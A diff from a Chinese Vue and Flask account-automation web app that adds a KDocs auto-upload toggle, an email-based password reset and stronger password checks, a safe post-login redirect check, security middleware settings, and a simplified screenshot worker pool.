display: flex;
justify-content: center;
}
.announcement-image img {
max-width: 100%;
max-height: 320px;
border-radius: 10px;
border: 1px solid var(--app-border);
object-fit: contain;
}
.feedback-title { .feedback-title {
display: flex; display: flex;
align-items: center; align-items: center;

View File

@@ -15,6 +15,7 @@ import {
updateAccount, updateAccount,
updateAccountRemark, updateAccountRemark,
} from '../api/accounts' } from '../api/accounts'
import { fetchKdocsSettings, updateKdocsSettings } from '../api/settings'
import { fetchRunStats } from '../api/stats' import { fetchRunStats } from '../api/stats'
import { useSocket } from '../composables/useSocket' import { useSocket } from '../composables/useSocket'
import { useUserStore } from '../stores/user' import { useUserStore } from '../stores/user'
@@ -57,6 +58,9 @@ watch(batchEnableScreenshot, (value) => {
} }
}) })
const kdocsAutoUpload = ref(false)
const kdocsSettingsLoading = ref(false)
const addOpen = ref(false) const addOpen = ref(false)
const editOpen = ref(false) const editOpen = ref(false)
const upgradeOpen = ref(false) const upgradeOpen = ref(false)
@@ -189,6 +193,30 @@ async function refreshAccounts() {
} }
} }
async function loadKdocsSettings() {
kdocsSettingsLoading.value = true
try {
const data = await fetchKdocsSettings()
kdocsAutoUpload.value = Number(data?.kdocs_auto_upload || 0) === 1
} catch {
kdocsAutoUpload.value = false
} finally {
kdocsSettingsLoading.value = false
}
}
async function onToggleKdocsAutoUpload(value) {
kdocsSettingsLoading.value = true
try {
await updateKdocsSettings({ kdocs_auto_upload: value ? 1 : 0 })
ElMessage.success(value ? '已开启自动上传(测试)' : '已关闭自动上传')
} catch (e) {
kdocsAutoUpload.value = !value
} finally {
kdocsSettingsLoading.value = false
}
}
async function onStart(acc) { async function onStart(acc) {
try { try {
await startAccount(acc.id, { browse_type: browseTypeById[acc.id] || '应读', enable_screenshot: batchEnableScreenshot.value }) await startAccount(acc.id, { browse_type: browseTypeById[acc.id] || '应读', enable_screenshot: batchEnableScreenshot.value })
@@ -524,6 +552,7 @@ onMounted(async () => {
unbindSocket = bindSocket() unbindSocket = bindSocket()
await refreshAccounts() await refreshAccounts()
await loadKdocsSettings()
await refreshStats() await refreshStats()
syncStatsPolling() syncStatsPolling()
}) })
@@ -612,6 +641,15 @@ onBeforeUnmount(() => {
<el-option v-for="opt in browseTypeOptions" :key="opt.value" :label="opt.label" :value="opt.value" /> <el-option v-for="opt in browseTypeOptions" :key="opt.value" :label="opt.label" :value="opt.value" />
</el-select> </el-select>
<el-switch v-model="batchEnableScreenshot" inline-prompt active-text="截图" inactive-text="不截图" /> <el-switch v-model="batchEnableScreenshot" inline-prompt active-text="截图" inactive-text="不截图" />
<el-switch
v-model="kdocsAutoUpload"
:disabled="kdocsSettingsLoading"
inline-prompt
active-text="上传"
inactive-text="不传"
@change="onToggleKdocsAutoUpload"
/>
<span class="app-muted">表格(测试)</span>
</div> </div>
<div class="toolbar-right"> <div class="toolbar-right">

View File

@@ -8,10 +8,8 @@ import {
forgotPassword, forgotPassword,
generateCaptcha, generateCaptcha,
login, login,
requestPasswordReset,
resendVerifyEmail, resendVerifyEmail,
} from '../api/auth' } from '../api/auth'
import { validateStrongPassword } from '../utils/password'
const router = useRouter() const router = useRouter()
@@ -32,20 +30,14 @@ const registerVerifyEnabled = ref(false)
const forgotOpen = ref(false) const forgotOpen = ref(false)
const resendOpen = ref(false) const resendOpen = ref(false)
const emailResetForm = reactive({ const forgotForm = reactive({
email: '', username: '',
captcha: '', captcha: '',
}) })
const emailResetCaptchaImage = ref('') const forgotCaptchaImage = ref('')
const emailResetCaptchaSession = ref('') const forgotCaptchaSession = ref('')
const emailResetLoading = ref(false) const forgotLoading = ref(false)
const forgotHint = ref('')
const manualResetForm = reactive({
username: '',
email: '',
new_password: '',
})
const manualResetLoading = ref(false)
const resendForm = reactive({ const resendForm = reactive({
email: '', email: '',
@@ -72,12 +64,12 @@ async function refreshLoginCaptcha() {
async function refreshEmailResetCaptcha() { async function refreshEmailResetCaptcha() {
try { try {
const data = await generateCaptcha() const data = await generateCaptcha()
emailResetCaptchaSession.value = data?.session_id || '' forgotCaptchaSession.value = data?.session_id || ''
emailResetCaptchaImage.value = data?.captcha_image || '' forgotCaptchaImage.value = data?.captcha_image || ''
emailResetForm.captcha = '' forgotForm.captcha = ''
} catch { } catch {
emailResetCaptchaSession.value = '' forgotCaptchaSession.value = ''
emailResetCaptchaImage.value = '' forgotCaptchaImage.value = ''
} }
} }
@@ -113,8 +105,14 @@ async function onSubmit() {
need_captcha: needCaptcha.value, need_captcha: needCaptcha.value,
}) })
ElMessage.success('登录成功,正在跳转...') ElMessage.success('登录成功,正在跳转...')
const urlParams = new URLSearchParams(window.location.search || '')
const next = String(urlParams.get('next') || '').trim()
const safeNext = next && next.startsWith('/') && !next.startsWith('//') && !next.startsWith('/\\') ? next : ''
setTimeout(() => { setTimeout(() => {
window.location.href = '/app' const target = safeNext || '/app'
router.push(target).catch(() => {
window.location.href = target
})
}, 300) }, 300)
} catch (e) { } catch (e) {
const status = e?.response?.status const status = e?.response?.status
@@ -136,36 +134,38 @@ async function onSubmit() {
async function openForgot() { async function openForgot() {
forgotOpen.value = true forgotOpen.value = true
forgotHint.value = ''
forgotForm.username = ''
forgotForm.captcha = ''
if (emailEnabled.value) { if (emailEnabled.value) {
emailResetForm.email = ''
emailResetForm.captcha = ''
await refreshEmailResetCaptcha() await refreshEmailResetCaptcha()
} else {
manualResetForm.username = ''
manualResetForm.email = ''
manualResetForm.new_password = ''
} }
} }
async function submitForgot() { async function submitForgot() {
if (emailEnabled.value) { forgotHint.value = ''
const email = emailResetForm.email.trim()
if (!email) { if (!emailEnabled.value) {
ElMessage.error('请输入邮箱') ElMessage.warning('邮件功能未启用,请联系管理员重置密码。')
return return
} }
if (!emailResetForm.captcha.trim()) {
const username = forgotForm.username.trim()
if (!username) {
ElMessage.error('请输入用户名')
return
}
if (!forgotForm.captcha.trim()) {
ElMessage.error('请输入验证码') ElMessage.error('请输入验证码')
return return
} }
emailResetLoading.value = true forgotLoading.value = true
try { try {
const res = await forgotPassword({ const res = await forgotPassword({
email, username,
captcha_session: emailResetCaptchaSession.value, captcha_session: forgotCaptchaSession.value,
captcha: emailResetForm.captcha.trim(), captcha: forgotForm.captcha.trim(),
}) })
ElMessage.success(res?.message || '已发送重置邮件') ElMessage.success(res?.message || '已发送重置邮件')
setTimeout(() => { setTimeout(() => {
@@ -173,43 +173,15 @@ async function submitForgot() {
}, 800) }, 800)
} catch (e) { } catch (e) {
const data = e?.response?.data const data = e?.response?.data
ElMessage.error(data?.error || '发送失败') const message = data?.error || '发送失败'
if (data?.code === 'email_not_bound') {
forgotHint.value = message
} else {
ElMessage.error(message)
}
await refreshEmailResetCaptcha() await refreshEmailResetCaptcha()
} finally { } finally {
emailResetLoading.value = false forgotLoading.value = false
}
return
}
const username = manualResetForm.username.trim()
const newPassword = manualResetForm.new_password
if (!username || !newPassword) {
ElMessage.error('用户名和新密码不能为空')
return
}
const check = validateStrongPassword(newPassword)
if (!check.ok) {
ElMessage.error(check.message)
return
}
manualResetLoading.value = true
try {
await requestPasswordReset({
username,
email: manualResetForm.email.trim(),
new_password: newPassword,
})
ElMessage.success('申请已提交,请等待审核')
setTimeout(() => {
forgotOpen.value = false
}, 800)
} catch (e) {
const data = e?.response?.data
ElMessage.error(data?.error || '提交失败')
} finally {
manualResetLoading.value = false
} }
} }
@@ -320,19 +292,42 @@ onMounted(async () => {
</el-card> </el-card>
<el-dialog v-model="forgotOpen" title="找回密码" width="min(560px, 92vw)"> <el-dialog v-model="forgotOpen" title="找回密码" width="min(560px, 92vw)">
<template v-if="emailEnabled"> <el-alert
<el-alert type="info" :closable="false" title="输入注册邮箱,我们将发送重置链接。" show-icon /> v-if="!emailEnabled"
type="warning"
:closable="false"
title="邮件功能未启用"
description="无法通过邮箱找回密码,请联系管理员重置密码。"
show-icon
/>
<el-alert
v-else
type="info"
:closable="false"
title="通过邮箱找回密码"
description="输入用户名并完成验证码,我们将向该账号绑定的邮箱发送重置链接。"
show-icon
/>
<el-alert
v-if="forgotHint"
type="warning"
:closable="false"
title="无法通过邮箱找回密码"
:description="forgotHint"
show-icon
class="alert"
/>
<el-form label-position="top" class="dialog-form"> <el-form label-position="top" class="dialog-form">
<el-form-item label="邮箱"> <el-form-item label="用户名">
<el-input v-model="emailResetForm.email" placeholder="name@example.com" /> <el-input v-model="forgotForm.username" placeholder="请输入用户名" />
</el-form-item> </el-form-item>
<el-form-item label="验证码"> <el-form-item label="验证码">
<div class="captcha-row"> <div class="captcha-row">
<el-input v-model="emailResetForm.captcha" placeholder="请输入验证码" /> <el-input v-model="forgotForm.captcha" placeholder="请输入验证码" />
<img <img
v-if="emailResetCaptchaImage" v-if="forgotCaptchaImage"
class="captcha-img" class="captcha-img"
:src="emailResetCaptchaImage" :src="forgotCaptchaImage"
alt="验证码" alt="验证码"
title="点击刷新" title="点击刷新"
@click="refreshEmailResetCaptcha" @click="refreshEmailResetCaptcha"
@@ -341,30 +336,11 @@ onMounted(async () => {
</div> </div>
</el-form-item> </el-form-item>
</el-form> </el-form>
</template>
<template v-else>
<el-alert type="warning" :closable="false" title="邮件功能未启用:提交申请后等待管理员审核。" show-icon />
<el-form label-position="top" class="dialog-form">
<el-form-item label="用户名">
<el-input v-model="manualResetForm.username" placeholder="请输入用户名" />
</el-form-item>
<el-form-item label="邮箱(可选)">
<el-input v-model="manualResetForm.email" placeholder="可选填写邮箱" />
</el-form-item>
<el-form-item label="新密码至少8位且包含字母和数字">
<el-input v-model="manualResetForm.new_password" type="password" show-password placeholder="请输入新密码" />
</el-form-item>
</el-form>
</template>
<template #footer> <template #footer>
<el-button @click="forgotOpen = false">取消</el-button> <el-button @click="forgotOpen = false">取消</el-button>
<el-button <el-button type="primary" :loading="forgotLoading" :disabled="!emailEnabled" @click="submitForgot">
type="primary" 发送重置邮件
:loading="emailEnabled ? emailResetLoading : manualResetLoading"
@click="submitForgot"
>
{{ emailEnabled ? '发送重置邮件' : '提交申请' }}
</el-button> </el-button>
</template> </template>
</el-dialog> </el-dialog>

View File

@@ -4,6 +4,7 @@ import { useRouter } from 'vue-router'
import { ElMessage } from 'element-plus' import { ElMessage } from 'element-plus'
import { fetchEmailVerifyStatus, generateCaptcha, register } from '../api/auth' import { fetchEmailVerifyStatus, generateCaptcha, register } from '../api/auth'
import { validateStrongPassword } from '../utils/password'
const router = useRouter() const router = useRouter()
@@ -68,8 +69,9 @@ async function onSubmit() {
ElMessage.error(errorText.value) ElMessage.error(errorText.value)
return return
} }
if (password.length < 6) { const passwordCheck = validateStrongPassword(password)
errorText.value = '密码至少6个字符' if (!passwordCheck.ok) {
errorText.value = passwordCheck.message || '密码格式不正确'
ElMessage.error(errorText.value) ElMessage.error(errorText.value)
return return
} }
@@ -166,10 +168,10 @@ onMounted(async () => {
v-model="form.password" v-model="form.password"
type="password" type="password"
show-password show-password
placeholder="至少6个字符" placeholder="至少8位且包含字母和数字"
autocomplete="new-password" autocomplete="new-password"
/> />
<div class="hint app-muted">至少6个字符</div> <div class="hint app-muted">至少8位且包含字母和数字</div>
</el-form-item> </el-form-item>
<el-form-item label="确认密码 *"> <el-form-item label="确认密码 *">
<el-input <el-input

21
app.py
View File

@@ -32,9 +32,9 @@ from browser_pool_worker import init_browser_worker_pool, shutdown_browser_worke
from realtime.socketio_handlers import register_socketio_handlers from realtime.socketio_handlers import register_socketio_handlers
from realtime.status_push import status_push_worker from realtime.status_push import status_push_worker
from routes import register_blueprints from routes import register_blueprints
from services.browser_manager import init_browser_manager from security import init_security_middleware
from services.checkpoints import init_checkpoint_manager from services.checkpoints import init_checkpoint_manager
from services.maintenance import start_cleanup_scheduler from services.maintenance import start_cleanup_scheduler, start_kdocs_monitor
from services.models import User from services.models import User
from services.runtime import init_runtime from services.runtime import init_runtime
from services.scheduler import scheduled_task_worker from services.scheduler import scheduled_task_worker
@@ -98,6 +98,9 @@ init_logging(log_level=config.LOG_LEVEL, log_file=config.LOG_FILE)
logger = get_logger("app") logger = get_logger("app")
init_runtime(socketio=socketio, logger=logger) init_runtime(socketio=socketio, logger=logger)
# 初始化安全中间件(需在其他中间件/Blueprint 之前注册)
init_security_middleware(app)
# 注册 Blueprint路由不变 # 注册 Blueprint路由不变
register_blueprints(app) register_blueprints(app)
@@ -195,7 +198,7 @@ def cleanup_on_exit():
except Exception: except Exception:
pass pass
logger.info("- 关闭浏览器线程池...") logger.info("- 关闭截图线程池...")
try: try:
shutdown_browser_worker_pool() shutdown_browser_worker_pool()
except Exception: except Exception:
@@ -264,6 +267,7 @@ if __name__ == "__main__":
logger.warning(f"警告: 邮件服务初始化失败: {e}") logger.warning(f"警告: 邮件服务初始化失败: {e}")
start_cleanup_scheduler() start_cleanup_scheduler()
start_kdocs_monitor()
try: try:
system_config = database.get_system_config() or {} system_config = database.get_system_config() or {}
@@ -274,15 +278,6 @@ if __name__ == "__main__":
except Exception as e: except Exception as e:
logger.warning(f"警告: 加载并发配置失败,使用默认值: {e}") logger.warning(f"警告: 加载并发配置失败,使用默认值: {e}")
logger.info("正在初始化浏览器管理器...")
try:
from services.browser_manager import init_browser_manager_async
logger.info("启动浏览器环境初始化(后台进行,不阻塞服务启动)...")
init_browser_manager_async()
except Exception as e:
logger.warning(f"警告: 启动浏览器初始化失败: {e}")
logger.info("启动定时任务调度器...") logger.info("启动定时任务调度器...")
threading.Thread(target=scheduled_task_worker, daemon=True, name="scheduled-task-worker").start() threading.Thread(target=scheduled_task_worker, daemon=True, name="scheduled-task-worker").start()
logger.info("✓ 定时任务调度器已启动") logger.info("✓ 定时任务调度器已启动")
@@ -301,7 +296,7 @@ if __name__ == "__main__":
except Exception: except Exception:
pool_size = 3 pool_size = 3
try: try:
logger.info(f"初始化截图线程池({pool_size}个worker按需启动浏览器空闲5分钟后自动关闭...") logger.info(f"初始化截图线程池({pool_size}个worker按需启动执行环境空闲5分钟后自动释放...")
init_browser_worker_pool(pool_size=pool_size) init_browser_worker_pool(pool_size=pool_size)
logger.info("✓ 截图线程池初始化完成") logger.info("✓ 截图线程池初始化完成")
except Exception as e: except Exception as e:

View File

@@ -122,6 +122,12 @@ class Config:
# ==================== 浏览器配置 ==================== # ==================== 浏览器配置 ====================
SCREENSHOTS_DIR = os.environ.get('SCREENSHOTS_DIR', '截图') SCREENSHOTS_DIR = os.environ.get('SCREENSHOTS_DIR', '截图')
COOKIES_DIR = os.environ.get('COOKIES_DIR', 'data/cookies') COOKIES_DIR = os.environ.get('COOKIES_DIR', 'data/cookies')
KDOCS_LOGIN_STATE_FILE = os.environ.get('KDOCS_LOGIN_STATE_FILE', 'data/kdocs_login_state.json')
# ==================== 公告图片上传配置 ====================
ANNOUNCEMENT_IMAGE_DIR = os.environ.get('ANNOUNCEMENT_IMAGE_DIR', 'static/announcements')
ALLOWED_ANNOUNCEMENT_IMAGE_EXTENSIONS = {'.png', '.jpg', '.jpeg', '.gif', '.webp'}
MAX_ANNOUNCEMENT_IMAGE_SIZE = int(os.environ.get('MAX_ANNOUNCEMENT_IMAGE_SIZE', '5242880')) # 5MB
# ==================== 并发控制配置 ==================== # ==================== 并发控制配置 ====================
MAX_CONCURRENT_GLOBAL = int(os.environ.get('MAX_CONCURRENT_GLOBAL', '2')) MAX_CONCURRENT_GLOBAL = int(os.environ.get('MAX_CONCURRENT_GLOBAL', '2'))
@@ -206,6 +212,10 @@ class Config:
LOGIN_ALERT_ENABLED = os.environ.get('LOGIN_ALERT_ENABLED', 'true').lower() == 'true' LOGIN_ALERT_ENABLED = os.environ.get('LOGIN_ALERT_ENABLED', 'true').lower() == 'true'
LOGIN_ALERT_MIN_INTERVAL_SECONDS = int(os.environ.get('LOGIN_ALERT_MIN_INTERVAL_SECONDS', '3600')) LOGIN_ALERT_MIN_INTERVAL_SECONDS = int(os.environ.get('LOGIN_ALERT_MIN_INTERVAL_SECONDS', '3600'))
ADMIN_REAUTH_WINDOW_SECONDS = int(os.environ.get('ADMIN_REAUTH_WINDOW_SECONDS', '600')) ADMIN_REAUTH_WINDOW_SECONDS = int(os.environ.get('ADMIN_REAUTH_WINDOW_SECONDS', '600'))
SECURITY_ENABLED = os.environ.get('SECURITY_ENABLED', 'true').lower() == 'true'
SECURITY_LOG_LEVEL = os.environ.get('SECURITY_LOG_LEVEL', 'INFO')
HONEYPOT_ENABLED = os.environ.get('HONEYPOT_ENABLED', 'true').lower() == 'true'
AUTO_BAN_ENABLED = os.environ.get('AUTO_BAN_ENABLED', 'true').lower() == 'true'
@classmethod @classmethod
def validate(cls): def validate(cls):
@@ -234,6 +244,9 @@ class Config:
if cls.LOG_LEVEL not in ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']: if cls.LOG_LEVEL not in ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']:
errors.append(f"LOG_LEVEL无效: {cls.LOG_LEVEL}") errors.append(f"LOG_LEVEL无效: {cls.LOG_LEVEL}")
if cls.SECURITY_LOG_LEVEL not in ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']:
errors.append(f"SECURITY_LOG_LEVEL无效: {cls.SECURITY_LOG_LEVEL}")
return errors return errors
@classmethod @classmethod

View File

@@ -1,42 +1,22 @@
#!/usr/bin/env python3 #!/usr/bin/env python3
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
"""浏览器池管理 - 工作线程池模式(真正的浏览器复用""" """截图线程池管理 - 工作线程池模式(并发执行截图任务"""
import os import os
import threading import threading
import queue import queue
import time import time
from typing import Callable, Optional, Dict, Any from typing import Callable, Optional, Dict, Any
import nest_asyncio
_NEST_ASYNCIO_APPLIED = False
_NEST_ASYNCIO_LOCK = threading.Lock()
def _apply_nest_asyncio_once() -> None:
"""按需应用 nest_asyncio避免 import 时产生全局副作用。"""
global _NEST_ASYNCIO_APPLIED
if _NEST_ASYNCIO_APPLIED:
return
with _NEST_ASYNCIO_LOCK:
if _NEST_ASYNCIO_APPLIED:
return
try:
nest_asyncio.apply()
except Exception:
pass
_NEST_ASYNCIO_APPLIED = True
# 安全修复: 将魔法数字提取为可配置常量 # 安全修复: 将魔法数字提取为可配置常量
BROWSER_IDLE_TIMEOUT = int(os.environ.get('BROWSER_IDLE_TIMEOUT', '300')) # 空闲超时(秒)默认5分钟 BROWSER_IDLE_TIMEOUT = int(os.environ.get('BROWSER_IDLE_TIMEOUT', '300')) # 空闲超时(秒)默认5分钟
TASK_QUEUE_TIMEOUT = int(os.environ.get('TASK_QUEUE_TIMEOUT', '10')) # 队列获取超时(秒) TASK_QUEUE_TIMEOUT = int(os.environ.get('TASK_QUEUE_TIMEOUT', '10')) # 队列获取超时(秒)
TASK_QUEUE_MAXSIZE = int(os.environ.get('BROWSER_TASK_QUEUE_MAXSIZE', '200')) # 队列最大长度(0表示无限制) TASK_QUEUE_MAXSIZE = int(os.environ.get('BROWSER_TASK_QUEUE_MAXSIZE', '200')) # 队列最大长度(0表示无限制)
BROWSER_MAX_USE_COUNT = int(os.environ.get('BROWSER_MAX_USE_COUNT', '0')) # 每个浏览器最大复用次数(0表示不限制) BROWSER_MAX_USE_COUNT = int(os.environ.get('BROWSER_MAX_USE_COUNT', '0')) # 每个执行环境最大复用次数(0表示不限制)
class BrowserWorker(threading.Thread): class BrowserWorker(threading.Thread):
"""浏览器工作线程 - 每个worker维护自己的浏览器""" """截图工作线程 - 每个worker维护自己的执行环境"""
def __init__( def __init__(
self, self,
@@ -55,99 +35,61 @@ class BrowserWorker(threading.Thread):
self.total_tasks = 0 self.total_tasks = 0
self.failed_tasks = 0 self.failed_tasks = 0
self.pre_warm = pre_warm self.pre_warm = pre_warm
self.last_activity_ts = 0.0
def log(self, message: str): def log(self, message: str):
"""日志输出""" """日志输出"""
if self.log_callback: if self.log_callback:
self.log_callback(f"[Worker-{self.worker_id}] {message}") self.log_callback(f"[Worker-{self.worker_id}] {message}")
else: else:
print(f"[浏览器池][Worker-{self.worker_id}] {message}") print(f"[截图池][Worker-{self.worker_id}] {message}")
def _create_browser(self): def _create_browser(self):
"""创建浏览器实例""" """创建截图执行环境(逻辑占位,无需真实浏览器"""
try: created_at = time.time()
from playwright.sync_api import sync_playwright
self.log("正在创建浏览器...")
playwright = sync_playwright().start()
browser = playwright.chromium.launch(
headless=True,
args=[
'--no-sandbox',
'--disable-setuid-sandbox',
'--disable-dev-shm-usage',
'--disable-gpu',
]
)
self.browser_instance = { self.browser_instance = {
'playwright': playwright, 'created_at': created_at,
'browser': browser,
'created_at': time.time(),
'use_count': 0, 'use_count': 0,
'worker_id': self.worker_id 'worker_id': self.worker_id,
} }
self.log(f"浏览器创建成功") self.last_activity_ts = created_at
self.log("截图执行环境就绪")
return True return True
except Exception as e:
self.log(f"创建浏览器失败: {e}")
return False
def _close_browser(self): def _close_browser(self):
"""关闭浏览器""" """关闭截图执行环境"""
if self.browser_instance: if self.browser_instance:
try: self.log(f"执行环境已释放(共处理{self.browser_instance.get('use_count', 0)}个任务)")
self.log("正在关闭浏览器...")
if self.browser_instance['browser']:
self.browser_instance['browser'].close()
if self.browser_instance['playwright']:
self.browser_instance['playwright'].stop()
self.log(f"浏览器已关闭(共处理{self.browser_instance['use_count']}个任务)")
except Exception as e:
self.log(f"关闭浏览器时出错: {e}")
finally:
self.browser_instance = None self.browser_instance = None
def _check_browser_health(self) -> bool: def _check_browser_health(self) -> bool:
"""检查浏览器是否健康""" """检查执行环境是否就绪"""
if not self.browser_instance: return bool(self.browser_instance)
return False
try:
return self.browser_instance['browser'].is_connected()
except:
return False
def _ensure_browser(self) -> bool: def _ensure_browser(self) -> bool:
"""确保浏览器可用(如果不可用则重新创建)""" """确保执行环境可用"""
if self._check_browser_health(): if self._check_browser_health():
return True return True
self.log("执行环境不可用,尝试重新创建...")
# 浏览器不可用,尝试重新创建
self.log("浏览器不可用,尝试重新创建...")
self._close_browser() self._close_browser()
return self._create_browser() return self._create_browser()
def run(self): def run(self):
"""工作线程主循环 - 按需启动浏览器模式""" """工作线程主循环 - 按需启动执行环境模式"""
if self.pre_warm: if self.pre_warm:
self.log("Worker启动预热模式启动即创建浏览器") self.log("Worker启动预热模式启动即准备执行环境")
else: else:
self.log("Worker启动按需模式等待任务时不占用浏览器资源)") self.log("Worker启动按需模式等待任务时不占用资源")
last_activity_time = 0
if self.pre_warm and not self.browser_instance: if self.pre_warm and not self.browser_instance:
if self._create_browser(): self._create_browser()
last_activity_time = time.time()
self.pre_warm = False self.pre_warm = False
while self.running: while self.running:
try: try:
# 允许运行中触发预热(例如池在初始化后调用 warmup # 允许运行中触发预热(例如池在初始化后调用 warmup
if self.pre_warm and not self.browser_instance: if self.pre_warm and not self.browser_instance:
if self._create_browser(): self._create_browser()
last_activity_time = time.time()
self.pre_warm = False self.pre_warm = False
# 从队列获取任务(带超时,以便能响应停止信号和空闲检查) # 从队列获取任务(带超时,以便能响应停止信号和空闲检查)
@@ -155,11 +97,11 @@ class BrowserWorker(threading.Thread):
try: try:
task = self.task_queue.get(timeout=TASK_QUEUE_TIMEOUT) task = self.task_queue.get(timeout=TASK_QUEUE_TIMEOUT)
except queue.Empty: except queue.Empty:
# 检查是否需要关闭空闲的浏览器 # 检查是否需要释放空闲的执行环境
if self.browser_instance and last_activity_time > 0: if self.browser_instance and self.last_activity_ts > 0:
idle_time = time.time() - last_activity_time idle_time = time.time() - self.last_activity_ts
if idle_time > BROWSER_IDLE_TIMEOUT: if idle_time > BROWSER_IDLE_TIMEOUT:
self.log(f"空闲{int(idle_time)}秒,关闭浏览器释放资源") self.log(f"空闲{int(idle_time)}秒,释放执行环境")
self._close_browser() self._close_browser()
continue continue
@@ -169,10 +111,37 @@ class BrowserWorker(threading.Thread):
self.log("收到停止信号") self.log("收到停止信号")
break break
# 按需创建或确保浏览器可用 # 按需创建或确保执行环境可用
if not self._ensure_browser(): browser_ready = False
self.log("浏览器不可用,任务失败") for attempt in range(2):
task['callback'](None, "浏览器不可用") if self._ensure_browser():
browser_ready = True
break
if attempt < 1:
self.log("执行环境创建失败,重试...")
time.sleep(0.5)
if not browser_ready:
retry_count = int(task.get("retry_count", 0) or 0) if isinstance(task, dict) else 0
if retry_count < 1 and isinstance(task, dict):
task["retry_count"] = retry_count + 1
try:
self.task_queue.put(task, timeout=1)
self.log("执行环境不可用,任务重新入队")
except queue.Full:
self.log("任务队列已满,无法重新入队,任务失败")
callback = task.get("callback")
if callable(callback):
callback(None, "执行环境不可用")
self.total_tasks += 1
self.failed_tasks += 1
continue
self.log("执行环境不可用,任务失败")
callback = task.get("callback") if isinstance(task, dict) else None
if callable(callback):
callback(None, "执行环境不可用")
self.total_tasks += 1
self.failed_tasks += 1 self.failed_tasks += 1
continue continue
@@ -185,30 +154,30 @@ class BrowserWorker(threading.Thread):
self.total_tasks += 1 self.total_tasks += 1
self.browser_instance['use_count'] += 1 self.browser_instance['use_count'] += 1
self.log(f"开始执行任务(第{self.browser_instance['use_count']}使用浏览器") self.log(f"开始执行任务(第{self.browser_instance['use_count']}执行")
try: try:
# 将浏览器实例传递给任务函数 # 将执行环境实例传递给任务函数
result = task_func(self.browser_instance, *task_args, **task_kwargs) result = task_func(self.browser_instance, *task_args, **task_kwargs)
callback(result, None) callback(result, None)
self.log(f"任务执行成功") self.log(f"任务执行成功")
last_activity_time = time.time() self.last_activity_ts = time.time()
except Exception as e: except Exception as e:
self.log(f"任务执行失败: {e}") self.log(f"任务执行失败: {e}")
callback(None, str(e)) callback(None, str(e))
self.failed_tasks += 1 self.failed_tasks += 1
last_activity_time = time.time() self.last_activity_ts = time.time()
# 任务失败后,检查浏览器健康 # 任务失败后,检查执行环境健康
if not self._check_browser_health(): if not self._check_browser_health():
self.log("任务失败导致浏览器异常,将在下次任务前重建") self.log("任务失败导致执行环境异常,将在下次任务前重建")
self._close_browser() self._close_browser()
# 定期重启浏览器释放Chromium可能累积的内存 # 定期重启执行环境,释放可能累积的资源
if self.browser_instance and BROWSER_MAX_USE_COUNT > 0: if self.browser_instance and BROWSER_MAX_USE_COUNT > 0:
if self.browser_instance.get('use_count', 0) >= BROWSER_MAX_USE_COUNT: if self.browser_instance.get('use_count', 0) >= BROWSER_MAX_USE_COUNT:
self.log(f"浏览器已复用{self.browser_instance['use_count']}次,重启释放资源") self.log(f"执行环境已复用{self.browser_instance['use_count']}次,重启释放资源")
self._close_browser() self._close_browser()
except Exception as e: except Exception as e:
@@ -225,7 +194,7 @@ class BrowserWorker(threading.Thread):
class BrowserWorkerPool: class BrowserWorkerPool:
"""浏览器工作线程池""" """截图工作线程池"""
def __init__(self, pool_size: int = 3, log_callback: Optional[Callable] = None): def __init__(self, pool_size: int = 3, log_callback: Optional[Callable] = None):
self.pool_size = pool_size self.pool_size = pool_size
@@ -241,17 +210,15 @@ class BrowserWorkerPool:
if self.log_callback: if self.log_callback:
self.log_callback(message) self.log_callback(message)
else: else:
print(f"[浏览器池] {message}") print(f"[截图池] {message}")
def initialize(self): def initialize(self):
"""初始化工作线程池按需模式默认预热1个浏览器""" """初始化工作线程池按需模式默认预热1个执行环境"""
with self.lock: with self.lock:
if self.initialized: if self.initialized:
return return
_apply_nest_asyncio_once() self.log(f"正在初始化截图线程池({self.pool_size}个worker按需启动执行环境...")
self.log(f"正在初始化工作线程池({self.pool_size}个worker按需启动浏览器...")
for i in range(self.pool_size): for i in range(self.pool_size):
worker = BrowserWorker( worker = BrowserWorker(
@@ -264,13 +231,13 @@ class BrowserWorkerPool:
self.workers.append(worker) self.workers.append(worker)
self.initialized = True self.initialized = True
self.log(f"工作线程池初始化完成({self.pool_size}个worker就绪浏览器将在有任务时按需启动)") self.log(f"截图线程池初始化完成({self.pool_size}个worker就绪执行环境将在有任务时按需启动)")
# 初始化完成后默认预热1个浏览器,降低容器重启后前几批任务的冷启动开销 # 初始化完成后默认预热1个执行环境,降低容器重启后前几批任务的冷启动开销
self.warmup(1) self.warmup(1)
def warmup(self, count: int = 1) -> int: def warmup(self, count: int = 1) -> int:
"""预热浏览器池 - 预创建指定数量的浏览器""" """预热截图线程池 - 预创建指定数量的执行环境"""
if count <= 0: if count <= 0:
return 0 return 0
@@ -281,7 +248,7 @@ class BrowserWorkerPool:
with self.lock: with self.lock:
target_workers = list(self.workers[: min(count, len(self.workers))]) target_workers = list(self.workers[: min(count, len(self.workers))])
self.log(f"预热浏览器池(预创建{len(target_workers)}浏览器...") self.log(f"预热截图线程池(预创建{len(target_workers)}执行环境...")
for worker in target_workers: for worker in target_workers:
if not worker.browser_instance: if not worker.browser_instance:
@@ -296,7 +263,7 @@ class BrowserWorkerPool:
time.sleep(0.1) time.sleep(0.1)
warmed = sum(1 for w in target_workers if w.browser_instance) warmed = sum(1 for w in target_workers if w.browser_instance)
self.log(f"浏览器池预热完成({warmed}浏览器就绪)") self.log(f"截图线程池预热完成({warmed}执行环境就绪)")
return warmed return warmed
def submit_task(self, task_func: Callable, callback: Callable, *args, **kwargs) -> bool: def submit_task(self, task_func: Callable, callback: Callable, *args, **kwargs) -> bool:
@@ -319,7 +286,8 @@ class BrowserWorkerPool:
'func': task_func, 'func': task_func,
'args': args, 'args': args,
'kwargs': kwargs, 'kwargs': kwargs,
'callback': callback 'callback': callback,
'retry_count': 0,
} }
try: try:
@@ -331,18 +299,44 @@ class BrowserWorkerPool:
def get_stats(self) -> Dict[str, Any]: def get_stats(self) -> Dict[str, Any]:
"""获取线程池统计信息""" """获取线程池统计信息"""
idle_count = sum(1 for w in self.workers if w.idle) workers = list(self.workers or [])
total_tasks = sum(w.total_tasks for w in self.workers) idle_count = sum(1 for w in workers if getattr(w, "idle", False))
failed_tasks = sum(w.failed_tasks for w in self.workers) total_tasks = sum(int(getattr(w, "total_tasks", 0) or 0) for w in workers)
